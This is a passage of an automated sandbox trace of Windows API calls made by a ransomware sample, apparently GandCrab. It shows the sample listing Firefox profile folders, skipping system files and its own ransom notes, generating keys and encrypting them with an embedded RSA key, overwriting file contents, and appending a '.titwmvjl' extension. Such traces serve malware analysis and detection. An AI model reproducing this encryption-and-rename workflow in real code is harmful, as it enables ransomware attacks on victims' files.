\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0079.907] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0079.908] CloseHandle (hObject=0x2cc) returned 1 [0079.908] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.908] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.909] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x19, wMilliseconds=0xda)) [0079.909] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.909] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0079.909] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0079.909] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\d2ca4a09d2ca4deb61a.lock") returned 99 [0079.909] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\crash reports\\events\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0079.910] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.911] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.911] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\") returned 75 [0079.911] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\*" [0079.911] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x503938 [0079.911] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.911] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0079.911] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.911] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.911] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0079.912] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0079.912] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0079.912] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\d2ca4a09d2ca4deb61a.lock" [0079.912] lstrlenW (lpString=".titwmvjl") returned 9 [0079.912] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\d2ca4a09d2ca4deb61a.lock") returned 99 [0079.912] VirtualAlloc (lpAddress=0x0, dwSize=0x106, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.912] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 108 [0079.912] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\d2ca4a09d2ca4deb61a.lock") returned 99 [0079.912] lstrlenW (lpString=".lock") returned 5 [0079.912] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.913] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0079.913] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.913] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.913] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0079.913] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0079.913] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0079.913] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\TITWMVJL-DECRYPT.txt" [0079.913] lstrlenW (lpString=".titwmvjl") returned 9 [0079.913] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\TITWMVJL-DECRYPT.txt") returned 95 [0079.913] VirtualAlloc (lpAddress=0x0, dwSize=0xfe, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.913] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 104 [0079.913] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\TITWMVJL-DECRYPT.txt") returned 95 [0079.913] lstrlenW (lpString=".txt") returned 4 [0079.913] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.913] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0079.914] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0079.914] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.914] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\TITWMVJL-DECRYPT.txt") returned 95 [0079.914] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\TITWMVJL-DECRYPT.txt") returned 95 [0079.914] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0079.914] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0079.914] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0079.914] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0079.914] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0079.914] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0079.914] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0079.914] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0079.914] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.914] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0079.914] FindClose (in: hFindFile=0x503938 | out: hFindFile=0x503938) returned 1 [0079.914] CloseHandle (hObject=0x2cc) returned 1 [0079.915] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0079.915] lstrcmpW (lpString1="InstallTime20170518000419", lpString2=".") returned 1 [0079.915] lstrcmpW (lpString1="InstallTime20170518000419", lpString2="..") returned 1 [0079.915] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpString2="InstallTime20170518000419" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170518000419") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170518000419" [0079.915] lstrlenW (lpString=".titwmvjl") returned 9 [0079.915] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170518000419") returned 93 [0079.915] VirtualAlloc (lpAddress=0x0, dwSize=0xfa, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.915] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170518000419.titwmvjl") returned 102 [0079.915] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170518000419") returned 93 [0079.915] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170518000419") returned 93 [0079.915] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170518000419") returned 93 [0079.915] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="desktop.ini") returned 1 [0079.915] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="autorun.inf") returned 1 [0079.915] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="ntuser.dat") returned -1 [0079.915] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="iconcache.db") returned 1 [0079.915] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="bootsect.bak") returned 1 [0079.915] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="boot.ini") returned 1 [0079.915] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="ntuser.dat.log") returned -1 [0079.915] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="thumbs.db") returned -1 [0079.915] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0079.915] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0079.915] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="KRAB-DECRYPT.html") returned -1 [0079.915] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="CRAB-DECRYPT.html") returned 1 [0079.915] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="KRAB-DECRYPT.txt") returned -1 [0079.915] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="CRAB-DECRYPT.txt") returned 1 [0079.915] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="ntldr") returned -1 [0079.915] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="NTDETECT.COM") returned -1 [0079.915] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="Bootfont.bin") returned 1 [0079.915] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170518000419") returned 93 [0079.915] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.916] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170518000419" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20170518000419"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0079.916] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0079.916] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.917] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0079.919] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.920] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.920] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.920] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0079.920] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.920] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.920] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.920] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.920] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0079.923] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.923] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.923] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.923] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0079.923] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.923] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.923] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.924] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.924] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0079.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.927] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503738) returned 1 [0079.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.927] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0079.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.928] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0079.928] GetLastError () returned 0x0 [0079.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.928] CryptDestroyKey (hKey=0x503738) returned 1 [0079.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.928] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.929] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0079.931] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.932] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503738) returned 1 [0079.932] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.932] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0079.932] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.932] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0079.932] GetLastError () returned 0x0 [0079.932] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.932] CryptDestroyKey (hKey=0x503738) returned 1 [0079.932] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.933] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.933] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0079.933] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0079.933] ReadFile (in: hFile=0x2cc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ea20*=0xa, lpOverlapped=0x0) returned 1 [0079.947] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffff6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.947] WriteFile (in: hFile=0x2cc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ea04*=0xa, lpOverlapped=0x0) returned 1 [0079.948] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.948] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0079.950] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.953] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.954] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.954] CloseHandle (hObject=0x2cc) returned 1 [0079.955] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170518000419" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20170518000419"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170518000419.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20170518000419.titwmvjl"), dwFlags=0x1) returned 1 [0079.956] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.956] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0079.956] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0079.956] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0079.956] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\TITWMVJL-DECRYPT.txt" [0079.956] lstrlenW (lpString=".titwmvjl") returned 9 [0079.956] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\TITWMVJL-DECRYPT.txt") returned 88 [0079.956] VirtualAlloc (lpAddress=0x0, dwSize=0xf0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.956] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 97 [0079.956] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\TITWMVJL-DECRYPT.txt") returned 88 [0079.956] lstrlenW (lpString=".txt") returned 4 [0079.956] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.957] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0079.957] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0079.957] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.957] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\TITWMVJL-DECRYPT.txt") returned 88 [0079.957] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\TITWMVJL-DECRYPT.txt") returned 88 [0079.957] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0079.957] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0079.957] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0079.957] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0079.957] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0079.957] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0079.957] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0079.957] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0079.957] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.957] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0079.957] FindClose (in: hFindFile=0x503638 | out: hFindFile=0x503638) returned 1 [0079.958] CloseHandle (hObject=0x2c4) returned 1 [0079.958] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.958] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0079.958] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0079.958] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\d2ca4a09d2ca4deb61a.lock" [0079.958] lstrlenW (lpString=".titwmvjl") returned 9 [0079.958] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\d2ca4a09d2ca4deb61a.lock") returned 78 [0079.958] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.959] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 87 [0079.959] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\d2ca4a09d2ca4deb61a.lock") returned 78 [0079.959] lstrlenW (lpString=".lock") returned 5 